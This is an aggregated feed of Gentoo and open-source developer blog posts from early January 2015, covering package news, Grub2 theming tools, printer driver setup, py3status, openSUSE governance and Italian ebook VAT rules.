Want to try? Just emerge app-admin/systemrescuecd-x86 and you'll comfortably find the ISO image installed on your harddrive in /usr/share/systemrescuecd/.
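
If you just want to take a quick look first (like the virtual machine I mentioned above), booting the installed ISO in QEMU/KVM works fine; the version number in the filename below is only an example:

qemu-system-x86_64 -enable-kvm -m 1024 -cdrom /usr/share/systemrescuecd/systemrescuecd-x86-4.4.1.iso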



From the /root/AUTHORS file in the rescue system:
SystemRescueCd (x86 edition)
Homepage: http://www.sysresccd.org/
Forums: http://www.sysresccd.org/forums/

* Main Author:  Francois Dupoux
* Other contributors:
  - Jean-Francois Tissoires (Oscar and many help for testing beta versions)
  - Franck Ladurelle (many suggestions, and help for scripts)
  - Pierre Dorgueil (reported many bugs and improvements)
  - Matmas did the port of linuxrc for loadlin
  - Gregory Nowak (tested the speakup)
  - Fred alias Sleeper (Eagle driver)
  - Thanks to Melkor for the help to port to unicode

Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Fortune cookie wisdom part VI (January 14, 2015, 19:11 UTC)

It’s been a long time since I’ve posted a new set of “Fortune cookie wisdom,” but I think that I have five good ones here. Before reading them, if you’d like to check out the previous posts in the series, you can with the links below:

Now that you’ve wasted a good amount of time reading those previous posts (hey, it’s better than watching more cat videos on YouTube, right?), here are the new ones:

  • Generosity and perfection are your everlasting goals.
  • We must always have old memories and young hopes.
  • Discontent is the first step in the progress of a man or a nation.
  • An important word of advice may come from a child.
  • Someone is looking up to you. Don’t let that person down.

I think that the third one is especially true in these times. With many political, social, economic, and societal decisions being made without full support of the people, it is necessary for individuals to express discontent before any change can begin. The fourth one is incredibly important to remember. We all too often forget that children can show us different ways of looking at otherwise maladroit or stale situations. They can enlighten us and open our eyes to perspectives that we may not have considered with our “adult” worldviews. I’m reminded of the recent Why advertisement from Charles Schwab:

It also ties nicely to the final one that I posted today. We need to remember to always act with integrity because there is always someone looking up to us, and modelling his or her behaviours after our own.

Good stuff, but like the previous post, I think that there was less of an emphasis on the funnier side of the fortune cookies. Hopefully I’ll get some new funny ones soon.

Cheers,
Zach

Donnie Berkholz a.k.a. dberkholz (homepage, bugs)
Gentoo needs focus to stay relevant (January 14, 2015, 03:36 UTC)

After nearly 12 years working on Gentoo and hearing blathering about how “Gentoo is about choice” and “Gentoo is a metadistribution,” I’ve come to a conclusion to where we need to go if we want to remain viable as a Linux distribution.

If we want to have any relevance, we need to have focus. Everything for everybody is a guarantee that you’ll be nothing for nobody. So I’ve come up with three specific use cases for Gentoo that I’d like to see us focus on:

People developing software

As Gentoo comes, by default, with a guaranteed-working toolchain, it’s a natural fit for software developers. A few years back, I tried to set up a development environment on Ubuntu. It was unbelievably painful. More recently, I attempted the same on a Mac. Same result — a total nightmare if you aren’t building for Mac or iOS.

Gentoo, on the other hand, provides a proven-working development environment because you build everything from scratch as you install the OS. If you need headers or some library, it’s already there. No problem. Whereas I’ve attempted to get all of the barebones dev packages installed on many other systems and it’s been hugely painful.

Frankly, I’ve never come across as easy of a dev environment as Gentoo, if you’ve managed to set it up as a user in the first place. And that’s the real problem.

People who need extreme flexibility (embedded, etc.)

Nearly 10 years ago, I founded the high-performance clustering project in Gentoo, because it was a fantastic fit for my needs as an end user in a higher-ed setting. As it turns out, it was also a good fit for a number of other folks, primarily in academia but also including the Adelie Linux team.

What we found was that you could get an extra 5% or so of performance out of building everything from scratch. At small scale that sounds absurd, but when that translates into 5-6 digits or more of infrastructure purchases, suddenly it makes a lot more sense.

In related environments, I worked on porting v5 of the Linux Terminal Server Project (LTSP) to Gentoo. This was the first version that was distro-native vs pretending to be a custom distro in its own right, and the lightweight footprint of a diskless terminal was a perfect fit for Gentoo.

In fact, around the same time I fit Gentoo onto a 1.8MB floppy-disk image, including either the dropbear SSH client or the kdrive X server for a graphical environment. This was only possible through the magic of the ROOT and PORTAGE_CONFIGROOT variables, which you couldn’t find in any other distro.
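
For the curious, the trick looks roughly like this; the target path and package are purely illustrative, the point being that Portage installs into ROOT and reads its configuration from PORTAGE_CONFIGROOT instead of /:

# install a package into a separate, minimal root instead of /
ROOT=/tmp/tinyroot PORTAGE_CONFIGROOT=/tmp/tinyroot emerge net-misc/dropbear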

Other distros such as ChromeOS and CoreOS have taken similar advantage of Gentoo’s metadistribution nature to build heavily customized Linux distros.

People who want to learn how Linux works

Finally, another key use case for Gentoo is for people who really want to understand how Linux works. Because the installation handbook actually works you through the entire process of installing a Linux distro by hand, you acquire a unique viewpoint and skillset regarding what it takes to run Linux, well beyond what other distros require. In fact I’d argue that it’s a uniquely portable and low-level skillset that you can apply much more broadly than those you could acquire elsewhere.

In conclusion

I’ve suggested three core use cases that I think Gentoo should focus on. If something doesn’t fit those use cases, I would suggest that we allow it, but not specifically dedicate effort to enabling it.

We’ve gotten overly deadened to how people actually want to use Linux, and this is my proposal as to how we could regain that relevance.


Tagged: gentoo

January 12, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Tool to preview Grub2 themes easily (using KVM) (January 12, 2015, 21:04 UTC)

The short version: To preview a Grub2 theme live does not have to be hard.

Hi!

When I first wrote about a (potentially too lengthy) way to make a Grub2 theming playground in 2012, I was hoping that people would start throwing Gentoo Grub2 themes around so that it would become harder picking one rather than finding one. As you know, that didn’t happen.

Therefore, I am taking a few more steps now.

So this post is about that new tool: grub2-theme-preview. Basically, it does the steps I blogged about in 2012, automated:

  • Creates a sparse disk as a regular file
  • Adds a partition to it and formats using ext2
  • Installs Grub2, copies a theme of your choice and a config file to make it work
  • Starts KVM

That way, a theme creator can concentrate on the actual work on the theme.

To give an example, to preview theme “Archxion” off GitHub as of today you could run:

git clone https://github.com/hartwork/grub2-theme-preview.git
git clone https://github.com/Generator/Grub2-themes.git
cd grub2-theme-preview
./grub2-theme-preview ../Grub2-themes/Archxion/

Once grub2-theme-preview has distutils/setuptools packaging and a Gentoo ebuild, that gets a bit easier still.

The current usage is:

# ./grub2-theme-preview --help
usage: grub2-theme-preview [-h] [--image] [--grub-cfg PATH] [--version] PATH

positional arguments:
  PATH             Path of theme directory (or image file) to preview

optional arguments:
  -h, --help       show this help message and exit
  --image          Preview a background image rather than a whole theme
  --grub-cfg PATH  Path grub.cfg file to apply
  --version        show program's version number and exit

Before using the tool, be warned that:

  • it is alpha/beta software,
  • it needs root permissions for some parts (calling sudo),
  • so I don’t take any warranty for anything right now!

Here is what to expect from running

# ./grub2-theme-preview /usr/share/grub/themes/gutsblack-archlinux/

assuming you have grub2-themes/gutsblack-archlinux off the grub2-themes overlay installed with this grub.cfg file:

Another example using the --image switch for background-image-only themes, using a 640×480 rendering of the vector remake of gentoo-cow:


The latter is a good candidate for that Grub2 version of media-gfx/grub-splashes I mentioned earlier.

I’m looking forward to your patches and pull requests!

 

New Gentoo overlay: grub2-themes (January 12, 2015, 20:38 UTC)

Hi!

I’ve been looking around for Grub2 themes a bit and started a dedicated overlay to not litter the main repository. The overlay is gentoo/grub2-themes-overlay on GitHub.

Any Gentoo developer on GitHub probably has received a

[GitHub] Subscribed to gentoo/grub2-themes-overlay notifications

mail already. I put it into the Gentoo project account rather than my personal account because I do not want this to be a solo project: you are welcome to extend and improve it. That includes pull requests from users.

The licensing situation (in the overlay, as well as with Grub2 themes in general) is not optimal. Right now, more or less all of the themes have all-rights-reserved for a license, since logos of various Linux distributions are included. So even if the theme itself is licensed under GPL v2 or later, the whole thing including icons is not. I am considering adding a USE flag "icons" to control cutting the icons away. That way, people with ACCEPT_LICENSE="-* @FREE" could still use at least some of these themes. By the way, I welcome help identifying the licenses of each of the original distribution logos, if that sounds like an interesting challenge to you.

More to come on Grub2 themes. Stay tuned.

Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Today's good news is that our manuscript "Thermally induced subgap features in the cotunneling spectroscopy of a carbon nanotube" has been accepted for publication by New Journal of Physics.
In a way, this work builds directly on our previous publication on thermally induced quasiparticles in niobium-carbon nanotube hybrid systems. As a contribution mainly from our theory colleagues, the modelling of transport processes is now enhanced and extended to cotunneling processes within Coulomb blockade. A generalized master equation based on the reduced density matrix approach in the charge conserved regime is derived, applicable to any strength of the intradot interaction and to finite values of the superconducting gap.
We show both theoretically and experimentally that distinct thermal "replica lines", due to the finite quasiparticle occupation of the superconductor, also occur in cotunneling spectroscopy at higher temperatures T~1K: the now-possible transport processes lead to additional conductance both at zero bias and at a finite voltage corresponding to an excitation energy; experiment and theoretical result match very well.

"Thermally induced subgap features in the cotunneling spectroscopy of a carbon nanotube"
S. Ratz, A. Donarini, D. Steininger, T. Geiger, A. Kumar, A. K. Hüttel, Ch. Strunk, and M. Grifoni
New J. Phys. 16, 123040 (2014), arXiv:1408.5000 (PDF)

http://www.akhuettel.de/publications/forschung.pdf
The 4/2014 edition of the "forschung" magazine of the DFG, published just a few days ago, includes an article about the work of our research group (in German)! Enjoy!

"Zugfest, leitend, defektfrei"
Carbon nanotubes are a fascinating material. In experiments at ultra-low temperatures, physicists try to bring their various properties into interplay with one another – and so to find answers to fundamental questions.
Andreas K. Hüttel
forschung 4/2014, 10-13 (2014) (PDF)

January 10, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Poppler is contributing to global warming (January 10, 2015, 19:48 UTC)


As you may have noticed by now if you're running ~arch, the Poppler release policies have changed.

Previously Poppler (app-text/poppler) used to have stable branches with an even middle version number, say e.g. 0.24, and bug fix releases 0.24.1, 0.24.2, 0.24.3, ... with a (most of the time) stable ABI. This meant that such upgrades could be installed without the need to rebuild any applications using Poppler. Development of new features took place in git master or in development releases such as, say, 0.25.1, with an odd middle number; these we never packaged in Gentoo anyway.

Now, the stable branches are gone, and Poppler has moved to a flat development model, with the 0.28.1 stable release (stable as intended by upstream, not "Gentoo stable") being followed by 0.29.0 and now 0.30.0 another month later. Unsurprisingly the ABI and the soversion of libpoppler.so has changed each time, triggering in Gentoo a rebuild of all applications linking to libpoppler.so. This includes among other things LuaTeX, Inkscape, and LibreOffice (wheee).

From a Gentoo maintainer point of view, the new schedule is not so bad; the API changes are minor (if any), and packages mostly "just compile". The only thing left to do is to check for soversion increases and bump the package subslot for the automated rebuild. We're much better off than all the binary distributions, since we can just keep tracking new Poppler releases and do not need to backport e.g. critical bug fixes ourselves just so the binary package fits to all the other binary packages of the distro.

From a Gentoo user point of view... well, I guess you can turn the heating down a bit. If you are running ~arch you will probably see some more LibreOffice rebuilds in the upcoming future. If things get too bad, you can always mask a new poppler version in /etc/portage/package.mask yourself (but better check for security bugs then, glsa-check from app-portage/gentoolkit is your friend); if the number of rebuilds gets completely out of hand, we may consider adding e.g. every second Poppler version only package-masked to the portage tree.
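
For example, holding back a particular Poppler bump until you feel like rebuilding would look like this (version picked purely as an illustration):

# /etc/portage/package.mask - skip this one bump for now
=app-text/poppler-0.30.0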

Aaron W. Swenson a.k.a. titanofold (homepage, bugs)
Dell 1350cnw on Gentoo Linux with CUPS (January 10, 2015, 13:00 UTC)

You’d think that a company that has produced and still produces some Linux-based products would also provide CUPS drivers for their printers, like the Dell 1350cnw. Not so, it seems. Still, I was undeterred and found a way to make it happen.

First, download the driver for the Xerox Phaser 6000 in DEB format. Yeah, that’s right. We’re going to use a Xerox driver to print to our Dell printer.

Once you have it, do the following on the command line:

# unzip 6000_6010_deb_1.01_20110210.zip
# cd deb_1.01_20110210
# ar x xerox-phaser-6000-6010_1.0-1_i386.deb
# tar xf data.tar.gz
# gunzip usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd.gz
# mkdir -p /usr/lib/cups/filter/
# cp ~/deb_1.01_20110210/usr/lib/cups/filter/xrhkaz* /usr/lib/cups/filter/
# mkdir -p /usr/share/cups/Xerox/dlut/
# cp ~/deb_1.01_20110210/usr/share/cups/Xerox/dlut/Xerox_Phaser_6010.dlut /usr/share/cups/Xerox/dlut/

Or, because I’ve seen rumors that there are other flavors of Linux, if you’re on a distribution that supports DEB files, just initiate the install from the DEB file, however one does that.

Finally, add the Dell 1350cnw via the CUPS browser interface. (I used whichever one had “net” in the title as the printer is connected directly to the network.) Upload  ~/deb_1.01_20110210/usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd when prompted for a driver.
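
If you prefer the command line over the web interface, lpadmin can do the same; the queue name and printer URI below are placeholders for your own setup:

# lpadmin -p Dell1350cnw -E -v socket://printer.example.lan:9100 -P ~/deb_1.01_20110210/usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd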

Everything works as expected for me, and in color!

January 09, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

I finally took the time to watch The Perl Jam: Exploiting a 20 Year-old Vulnerability [31c3]. Oh, my, god.

January 07, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Slock 1.2 background colour (January 07, 2015, 02:41 UTC)

In a previous post, I discussed the method for changing the background colour for slock 1.1. Now that slock 1.2 is out, and is in the Portage tree in Gentoo, the ‘savedconfig’ USE flag is a little different than it used to be. In 1.1, the ‘savedconfig’ USE flag would essentially copy the config.mk file to /etc/portage/savedconfig/x11-misc/slock-$version. Now, in slock 1.2, there is still a config file in that location, but it is not just a copy of the config.mk file. Rather, one will see the following two-line file:

# cat /etc/portage/savedconfig/x11-misc/slock-1.2
#define COLOR1 "black"
#define COLOR2 "#005577"

As indicated in the file, you can use either a name for a generic colour (like “black”) or the hex representation for the colour of your choice (see The Color Picker for an easy way to find the hex code for your colours).

There are two things to keep in mind when editing this file:

  • The initial hash (#) does NOT indicate a comment and MUST remain. If you remove it, slock 1.2 will fail to compile.
  • The COLOR1 variable is for the default colour of the background, whilst the COLOR2 variable is for the background colour once one starts typing on a slocked screen

Hope that this information helps for those people using slock (especially within Gentoo Linux).

Cheers,
Zach

January 06, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Finding a better blog workflow (January 06, 2015, 00:12 UTC)

I have been ranting about editors in the past few months, a year after considering shutting the blog down. After some more thinking and fighting, I now have a better plan and the blog is not going away.

First of all, I decided to switch my editing to Draft and started paying for a subscription at $3.99/month. It's a simple-as-it-can-be editor, with no pretence. It provides the kind of "spaced out" editing that is so trendy nowadays and it provides a so-called "Hemingway" mode that does not allow you to delete. I don't really care for it, but it's not so bad.

More importantly it gets the saving right: if the same content is being edited in two different browsers, one gets locked (so I can’t overwrite the content), and a big red message telling me that it can’t save appears the moment I try to edit something and the Internet connection goes away or I get logged out. It has no fancy HTML editor, and instead is designed around Markdown, which is what I’m using nowadays to post on my blog as well. It supports C-i and C-b just fine.

As for the blog engine I decided not to change it. Yet. But I also decided that upgrading it to Publify is not an option. Among other things, as I went digging trying to fix a few of the problems I've been having I've discovered just how spaghetti-code it was to begin with, and I lost any trust in the developers. Continuing to build upon Typo without taking time to rewrite it from scratch is in my opinion time wasted. Upstream's direction has been building more and more features to support Heroku, CDNs, and so on so forth — my target is to make it slimmer so I started deleting good chunks of code.

The results have been positive, and after some database cleanup and removing support for structures that never were implemented to begin with (like primary and hierarchical categories), browsing the blog should be much faster and less of a pain. Among the features I dropped altogether is the theming, as the code is now very specific to my setup, and that allowed me to use the Rails asset pipeline to compile the stylesheets and javascripts; this should lead to faster load time for all (even though it also caused a global cache invalidation, sorry about that!)

My current plan is to not spend too much time on the blog engine in the next few weeks, as it reached a point where it's stable enough, but rather fix a few things in the UI itself, such as the Amazon ads loading that are currently causing some things to jump across the page a little too much. I also need to find a new, better way to deal with image lightboxes — I don't have many in use, but right now they are implemented with a mixture of Typo magic and JavaScript — ideally I'd like for the JavaScript to take care of everything, attaching itself to data-fullsize-url attributes or something like that. But I have not looked into replacements explicitly yet, suggestions welcome. Similarly, if anybody knows a good JavaScript syntax highlighter to replace coderay, I'm all ears.

Ideally, I'll be able to move to Rails 4 (and thus Passenger 4) pretty soon. Although I'm not sure how well that works with PostgreSQL. Adding (manually) some indexes to the tables and especially making sure that the diamond-tables for tags and categories did not include NULL entries and had a proper primary key being the full row made quite the difference in the development environment (less so in production as more data is cached there, but it should still be good if you're jumping around my old blog posts!)

Coincidentally, among the features I dropped off the codebase I included the update checks and inbound links (that used the Google Blog Search service that does not exist any more), making the webapp network free — Akismet stopped working some time ago and that is one of the things I want to re-introduce actually, but then again I need to make sure that the connection can be filtered correctly.

By the way, for those who are curious why I spend so much time on this blog: I have been able to preserve all the content I could, from my first post on Planet Gentoo in April 2005, on b2evolution. Just a few months short of ten years now. I also was able to recover some posts from my previous KDEDevelopers blog from February that year and a few (older) posts in Italian that I originally sent to the Venice Free Software User Group in 2004. Which essentially means, for me, over ten years of memories and words. It is dear to me and most of you won’t have any idea how much — it probably also says something about priorities in my life, but who cares.

I'm only bothered that I can't remember where I put the backup from blogspot I made of what I was writing when I was in high school. Sure it's not exactly the most pleasant writing (and it was all in Italian), but I really would like for it to be part of this single base. Oh and this is also the reason why you won't see me write more on G+ or Facebook — those two and Twitter are essentially just a rant platform to me, but this blog is part of my life.

January 05, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Gentoo Grub 2.x theme? (January 05, 2015, 22:11 UTC)

Hi!

It’s 2015 and I have not heard of any Gentoo GRUB 2.x themes, yet. Have you?

If you could imagine working on a theme based on the vector remake of gentoo-cow (with sound licensing), please get in touch!

CoreOS is based on… Gentoo! (January 05, 2015, 16:39 UTC)

I first heard about CoreOS from LWN.net in the news item on Rocket, CoreOS’s fork/re-write of Docker.

I ran into CoreOS again on 31c3 and learned it is based on… Gentoo! A few links for proof:

January 04, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

I'm posting this here because a new LibreOffice version was stabilized two days ago, and at the same time a hidden bug crept in...

Because of an unintended interaction between a python-related eclass and the app-office/libreoffice ebuilds (any version), merging recently self-generated (see below for exact timeframe) libreoffice binary packages can fail to install with the error

* ERROR: app-office/libreoffice-4.3.5.2::gentoo failed (setup phase):
* PYTHON_CFLAGS is invalid for python-r1 suite, please take a look @ https://wiki.gentoo.org/wiki/Project:Python/Python.eclass_conversion#PYTHON_CFLAGS 

The problem is fixed now, but any libreoffice binary packages generated with a portage tree from Fri Jan 2 00:15:15 2015 UTC to Sun Jan 4 22:18:12 2015 UTC will fail to reinstall. Current recommendation is to delete the self-generated binary package and re-install libreoffice from sources (or use libreoffice-bin).
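
In practice the recovery boils down to something like the following; the binary package path assumes the default PKGDIR of /usr/portage/packages, so adjust it if yours differs:

# remove the broken self-built binary package, then rebuild from source
rm /usr/portage/packages/app-office/libreoffice-4.3.5.2.tbz2
emerge --oneshot app-office/libreoffice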

This does NOT affect app-office/libreoffice-bin.

Updates may be posted here or on bug 534726. Happy heating. At least it's winter.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v2.0 (January 04, 2015, 19:16 UTC)

I’m very pleased to announce the release of py3status v2.0 which I’d like to dedicate to the person who’s behind all the nice improvements this release features : @tablet-mode !

His idea on issue #44 was to make py3status modules configurable. After some thoughts and merges of my own plans of development, we ended up with what I believe are the most ambitious features py3status provides so far.

Features

The logic behind this release is that py3status now wraps and extends your i3status.conf which allows all the following crazy features :

Click events are now supported for all your i3bar modules, i3status and py3status alike, thanks to the new on_click parameter which you can use like any other i3status.conf parameter on any module. It has never been so easy to handle click events !

This is a quick and small example of what it looks like:

# run thunar when I left click on the / disk info module
disk / {
    format = "/ %free"
    on_click 1 = "exec thunar /"
}
  • All py3status contributed modules are now shipped and usable directly, without the need to copy them to your local folder. They can also be configured directly from your i3status config (see below)

No need to copy and edit the contributed py3status modules you like and wish to use: you can now load and configure them directly from your i3status.conf.

All py3status modules (contributed ones and user-loaded ones) are now loaded and ordered using the usual order += syntax in your i3status.conf!
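
For instance, loading and configuring one of the contributed modules could look roughly like this (the module name and parameter below are only meant as an illustration; check the py3status documentation for the real ones):

# enable a contributed py3status module and configure it straight from i3status.conf
order += "sysdata"

sysdata {
    cache_timeout = 10
}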

  • All modules have been improved, cleaned up and some of them got some love from contributors.
  • Every click event now triggers a refresh of the clicked module, even for i3status modules. This makes your i3bar more responsive than ever!

Contributors

  • @AdamBSteele
  • @obb
  • @scotte
  • @tablet-mode

Thank you

  • Jakub Jedelsky : py3status is now packaged on Fedora Linux.
  • All of you users: py3status has passed 100 stars on github, I’m still amazed by this. @Lujeni’s prophecy has come true :)
  • I still have some nice ideas in stock for even more functionality, stay tuned!

Michal Hrusecky a.k.a. miska (homepage, bugs)
Challenges in 2015 (January 04, 2015, 13:34 UTC)

Champagne Showers by Merlin2525

You might have noticed that I decided to run for the openSUSE Board. And as we have just entered a new year and everybody is evaluating the past and the future, I will do the same, mainly focusing on a few of the challenges that I see lying in front of the openSUSE Board in 2015.

SUSE/openSUSE relation

I have heard it mentioned over and over: SUSE and openSUSE are two different things. But at the same time, they are pretty close. Close enough to be confusing. We have similar yet slightly distinct branding, similar yet slightly distinct names, and a clear overlap in terms of contributors. For people inside the project, it is easy to distinguish the entities. For people outside, not so much.

There was a nice talk by Zvezdana and Kent at the openSUSE Conference about our branding. Part of the talk, and one thing that people notice about openSUSE and SUSE, is our logo. SUSE keeps updating its logo and it is drifting further away over time; the openSUSE logo, on the other hand, stays the same. One open question from the talk was how to fix this: either start diverging with our branding or get closer together. I know this is mainly a question for the artwork team, but as it will affect all of us, there should be a broad discussion, and as it involves the logo and trademark, SUSE and the board need to be involved as well.

Apart from the logo/branding, there is also a technical aspect to the relation. We all say that openSUSE is the technical upstream of SLE. Things are being developed and tested in openSUSE and then adopted by SLE. But sometimes it is vice versa, as SUSE needs to develop some feature for SLE or one of its service packs and push it there. And as the SLE and openSUSE schedules are unrelated, sometimes they can’t push it to openSUSE first. Even after a release, openSUSE and SLE start diverging and only come together once every five years or so, when it is time to release a new SLE. It’s kind of a shame that we can’t help each other more often. It would be great to get SLE and openSUSE closer together in a mutually beneficial way. But this is not going to be an easy nor a fast discussion, again involving quite a few teams/people. And I believe the Board should act as mediator/initiator in this discussion as well.

openSUSE Release

While talking about the release, we still officially have an eight-month release cycle (or, more precisely, a “whenever coolo says so” release cycle). It would be nice to have a decision that, since the last two releases came out after 12 months, we are switching to a one-year release cycle. Or to decide to stick with eight months. Or to go for something completely different. But again, the point is that this is a hard discussion to have, but I believe we have to start it and have a clear outcome, so people can count on it. There is not much for the board to do here apart from calming heated discussions, but maybe it would make sense to delay the start of this discussion until after the SLE/openSUSE relation discussion (which probably needs the board involved) and take its results into account. I personally think it definitely makes sense to at least align the SLE and openSUSE schedules a little bit…

Conference

Last year we had a great conference in Dubrovnik. It was an awesome place, with quite a few interesting discussions as every year, but unfortunately not that many people. I liked it, and hats off to the organizers, but we need to figure out what went wrong and why not so many people showed up in person. I hope for the best in The Hague and that this year's conference will again see plenty of people; although the last conference was great, losing attendees at our most important event – the openSUSE Conference – was also kind of disturbing… So we will see what happens in The Hague.

The rest

I’m sure there will be other challenges as well. In fact, I would like more things to happen in the coming year. But for those things, I don’t need a board; I can do them, or at least start them, myself. The few that I just mentioned are only those that I see as important, in need of some involvement from the board, and not yet entirely solved from last year. Hopefully all of them will be solved in the next year and we will have different problems, like how to find even the most subtle bugs once all other ones are solved, how to change the world for the better, and whether there is still anything left to improve after everything we did in 2015 :-)

January 03, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
The Italian ISBN fraud (January 03, 2015, 17:12 UTC)

Books
Photo credit: Moyan Brenn

The title of the post is probably considered clickbait, but I think there is a fraud going on in Italy related to ISBN, and since I noted on my Facebook page that I have more information on this than the average person, even those who are usually quite well informed, I thought it's worth putting it down on paper.

It all started with an email I got from Amazon, in particular from the Kindle Direct Publishing service, which is how I publish Autotools Mythbuster as a Kindle book. At first I thought it was about the new VAT regulation for online services across Europe that is being announced by everybody and that will soon make most websites give you ex-VAT prices and let you figure out how much you're actually paying. And indeed it was, until you get to this post-script:

Lastly, as of January 1, 2015, Italy has put in place a new law. Applicable VAT for eBooks sold in Italy will depend on whether the book has an ISBN. All eBooks with an ISBN will have a 4% VAT rate and eBooks without an ISBN will have a 22% VAT rate. This is the rate that is added to your price on January 1st and is the rate deducted when an Italian customer purchases your book. If you obtain an ISBN after January 1st, the 4% VAT rate will then apply for future sales but we will not adjust your list price automatically.

Since I've always felt strongly that discriminating books on whether they are paper or bits is a bad idea, the reduced VAT rate for books was actually good news, but tying it to the ISBN? Not so much. And here's why.

First of all, let's bust the myth of the ISBN being a requirement to publish a book. It's not, at least not universally. In particular, it's not a requirement in Italy, the Republic of Ireland, or the United States of America. It is also not clear to many that in quite a few countries, including at least Italy and the Republic of Ireland, ISBN distribution is managed by privately held companies. In other countries there's a government agency to do that, and it may well be that it's more regulated there.

In the case of the UK agency (which also handles the Republic of Ireland and is thus relevant to me), they also make explicit that there are plenty of situations in which you should not apply an ISBN, for instance for booklets that are not sold to the public (private events, museums, etc.). It might sound odd, but it makes perfect sense the moment you realize what ISBN was designed to help with: distribution. The idea behind it is that any single edition of a book has a unique code, so when your bookstore orders from the distributor, and the distributor from the publisher, the same ID is used all along the chain. A secondary benefit for citing references and bibliographies is often mentioned, but it is by far not the reason why ISBN was introduced.

So why would you tie the VAT rate to the presence of an ISBN? I can't think of any particularly good reason off the top of my head. It makes things quite a bit more complex for online ebook stores, especially those that have not been limited to stocking books with an ISBN to begin with (such as Amazon, Kobo, …). But even more, it makes it almost impossible for authors to figure out how to charge the buyers, if both are in Europe. All is still easy of course if you're not trying to sell to Europe, or from Europe — wonder why we don't have more European startups, eh?

The bothersome part is that there is no such rule about VAT for physical books! Indeed, many people in Italy are acquainted with schemes in which you join a "club" that sends you a book every month (unless you opt out month by month, and if you don't, you have to pay the price for it), and that sells books at prices much lower than the bookstore.

I'm sure they still exist, although I'm not sure whether Amazon leaves them much appeal now. It was how I got into Lord of the Rings, as I ended up paying some €1.25 for it rather than the €30 asked for the same (hardcover) edition.

All those books were printed especially for the "club" and would thus not have an ISBN attached to them at all. One of the reasons was probably to make it more difficult to sell them back second hand. But they have always been charged at 4% VAT anyway!

But the problems run further, and that's hard to see for most consumers because they don't realize just how difficult the ISBN system is to navigate. Especially for "live" books like Autotools Mythbuster, every single revision needs its own unique ISBN — and since I usually do three to four updates to the book every year, that would be at least four different ISBNs per year. Add to that the fact that agencies decided that "ebook" is not a format (ePub, Mobi and PDF are), and you end up requiring multiple ISBNs per revision to cover these formats.

Assume only two formats are needed for Autotools Mythbuster, which is only available on Amazon and Kobo. Assume three revisions a year (I would like to do more; I plan on spending more of 2015 writing documentation as I'm doing less hands-on work in Open Source lately). Now you need six ISBNs per year. If I were living in Canada, the problem would be solved to begin with – ISBN assignments in Canada are free – but I live in Ireland, and Nielsen is a for-profit company (I'll leave Italy aside for a moment and will go back to it later). If I were to buy a block of 10 codes (the minimum amount), I would have to pay £120 plus VAT, and that would last me for almost two years — but that requires me to make some €300-400 in royalties over those two years to break even on the up-front cost — there are taxes to be paid on the royalties, you know.

This means well over two hundred copies of the book would have to be sold — I would love that, but I'm sure there aren't that many people interested in what I write. And not two hundred in total, but two hundred every year — every update would have a hidden cost due to the ISBN needing to be updated, and if you provide the update for free (as I want to do), then you need to sell incrementally more copies.

Now, I said above I'd leave Italy aside — here is why: up until now, the Italian agency for ISBN assignment only allowed publishers to buy blocks of ISBN codes — independent authors had no choice and could not get an ISBN at all. It probably had something to do with the fact that the agency is owned by the Italian publishers' association (Associazione Italiana Editori). Admittedly the price is quite a bit more affordable if you are a publisher, as it is €30 to join and €50 per 10 codes.

But of course with the new law coming into effect it would have been too much of a discrimination against independent authors to not allow them to get ISBNs at all. So the agency decided that starting this January (or rather, starting from next week, as they are on vacation until the 7th) they will hand out individual ISBNs for "authorpublishing" — sic, in English, I wonder how drunk they were to come up with such a term, when the globally used term would be self-publishing. Of course the fee for those is €25 per code instead, five times as expensive as a publisher would pay for them.

And there is no documentation on how to apply for those yet, because of course they are still on vacation (January 6th is a holiday in Italy, and it's common for companies, schools, etc. to take the whole first week off), and of course they only started providing the numbers when the law entered into effect, to avoid the discrimination. But of course it means that until the authors can find the time to look into the needed documentation, they will be discriminated against. Again, only in Italy, as the rest of Europe does not have any such silly rule.

Now, at least a friend of mine was happy that at least for the majority of ebooks we'll see a reduced VAT — but will we? I doubt it; as with any VAT change, prices will likely remain the same. When VAT increased from 20% to 21%, stores advertised the increased price for a week, then they came back to what they were before — because something priced at €3.99 wouldn't remain priced at €4.02 for long, it's even less convenient. In this case, I doubt that any publisher will change their MSRP for the ebooks to match the reduced VAT — I think the only place where this is going to make a difference is Amazon, as their KDP interface now matches the US price to the ex-VAT price of the books, so the prices across Amazon websites no longer match across markets as they apply the local VAT; but I wouldn't be surprised if publishers still set an MSRP on Amazon to match the same VAT-inclusive price before and after the 22%→4% change, essentially increasing their margin by over 10%.

I'm definitely unconvinced by the new VAT regulations in Europe; they are essentially designed as a protectionist measure for the various countries' online-services companies. But right now they are just making it more complex for all the final customers to figure out how much they are paying, and in Italy in particular they seem to be on track to ruin the newly-revived independent authors' market, which has been, to me, a nice gift of modern ebook distribution.

Sven Vermeulen a.k.a. swift (homepage, bugs)

Large companies that handle their own IT often have internal support teams for many of the technologies that they use. Most of the time, this is for reusable components like database technologies, web application servers, operating systems, middleware components (like file transfers, messaging infrastructure, …) and more. All components that are used and deployed multiple times, and thus warrant the expenses of a dedicated engineering team.

Such teams often have (or need to write) secure configuration deployment guides, so that these components are installed in the organization with as few misconfigurations as possible. A wrongly configured component is often worse than a vulnerable component, because vulnerabilities are usually fixed by software upgrades (you do patch your software, right?) whereas misconfigurations survive these updates and remain exploitable for longer periods. Also, misuse of components is harder to detect than exploitation of vulnerabilities, because it often looks like regular user behavior.

